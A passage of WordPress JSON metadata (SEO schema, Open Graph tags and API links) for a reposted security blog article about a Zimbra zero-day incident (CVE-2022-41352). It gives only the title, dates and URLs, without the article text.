2\"},\"image\":{\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/version-2.com\\\/zh\\\/#\\\/schema\\\/person\\\/d14d2d3cd77ffdb618b9f1330fe084db\",\"name\":\"version2hk\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"zh-HK\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g\",\"caption\":\"version2hk\"},\"sameAs\":[\"http:\\\/\\\/version2xfortcom.wordpress.com\"],\"url\":\"https:\\\/\\\/version-2.com\\\/zh\\\/author\\\/version2hk\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352) - Version 2","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/","og_locale":"zh_HK","og_type":"article","og_title":"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352) - Version 2","og_description":"Incident Overview On October 7, the email server of a b [&hellip;]","og_url":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/","og_site_name":"Version 2","article_published_time":"2022-10-24T01:37:54+00:00","article_modified_time":"2023-10-16T09:35:14+00:00","og_image":[{"url":"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/initial_access.png","type":"","width":"","height":""}],"author":"version2hk","twitter_card":"summary_large_image","twitter_misc":{"\u4f5c\u8005":"version2hk","\u9810\u8a08\u95b1\u8b80\u6642\u9593":"7 \u5206\u9418"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/#article","isPartOf":{"@id":"https:\/\/version-2.com\/2022\/10\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/"},"author":{"name":"version2hk","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/d14d2d3cd77ffdb618b9f1330fe084db"},"headline":"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352)","datePublished":"2022-10-24T01:37:54+00:00","dateModified":"2023-10-16T09:35:14+00:00","mainEntityOfPage":{"@id":"https:\/\/version-2.com\/2022\/10\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/"},"wordCount":1264,"publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"image":{"@id":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/#primaryimage"},"thumbnailUrl":"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/initial_access.png","keywords":["2022","UnderDefense"],"articleSection":["2022","UnderDefense","Press Release"],"inLanguage":"zh-HK"},{"@type":"WebPage","@id":"https:\/\/version-2.com\/2022\/10\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/","url":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/","name":"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352) - Version 2","isPartOf":{"@id":"https:\/\/version-2.com\/zh\/#website"},"primaryImageOfPage":{"@id":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/#primaryimage"},"image":{"@id":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/#primaryimage"},"thumbnailUrl":"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/initial_access.png","datePublished":"2022-10-24T01:37:54+00:00","dateModified":"2023-10-16T09:35:14+00:00","breadcrumb":{"@id":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/#breadcrumb"},"inLanguage":"zh-HK","potentialAction":[{"@type":"ReadAction","target":["https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/"]}]},{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/#primaryimage","url":"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/initial_access.png","contentUrl":"https:\/\/underdefense.com\/wp-content\/uploads\/2022\/10\/initial_access.png"},{"@type":"BreadcrumbList","@id":"https:\/\/underdefense.com\/blog\/massive-infection-through-0-day-in-the-zimbra-email-suite-cve-2022-41352\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"\u9996\u9801","item":"https:\/\/version-2.com\/"},{"@type":"ListItem","position":2,"name":"Massive Infection through 0-day in the Zimbra Email suite (CVE-2022-41352)"}]},{"@type":"WebSite","@id":"https:\/\/version-2.com\/zh\/#website","url":"https:\/\/version-2.com\/zh\/","name":"Version 2","description":"","publisher":{"@id":"https:\/\/version-2.com\/zh\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/version-2.com\/zh\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"zh-HK"},{"@type":"Organization","@id":"https:\/\/version-2.com\/zh\/#organization","name":"Version 2","url":"https:\/\/version-2.com\/zh\/","logo":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/","url":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","contentUrl":"https:\/\/i0.wp.com\/version-2.com\/wp-content\/uploads\/2020\/08\/v2-hk-hor-4.png?fit=1795%2C335&ssl=1","width":1795,"height":335,"caption":"Version 2"},"image":{"@id":"https:\/\/version-2.com\/zh\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/version-2.com\/zh\/#\/schema\/person\/d14d2d3cd77ffdb618b9f1330fe084db","name":"version2hk","image":{"@type":"ImageObject","inLanguage":"zh-HK","@id":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/d280627252b42d7489de74dd88aa04043a495f25e258575000dc767e287bf94c?s=96&d=identicon&r=g","caption":"version2hk"},"sameAs":["http:\/\/version2xfortcom.wordpress.com"],"url":"https:\/\/version-2.com\/zh\/author\/version2hk\/"}]}},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/pbQRKm-fmm","post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/59046","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/users\/143524195"}],"replies":[{"embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/comments?post=59046"}],"version-history":[{"count":8,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/59046\/revisions"}],"predecessor-version":[{"id":73033,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/posts\/59046\/revisions\/73033"}],"wp:attachment":[{"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/media?parent=59046"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/categories?post=59046"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/version-2.com\/zh\/wp-json\/wp\/v2\/tags?post=59046"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}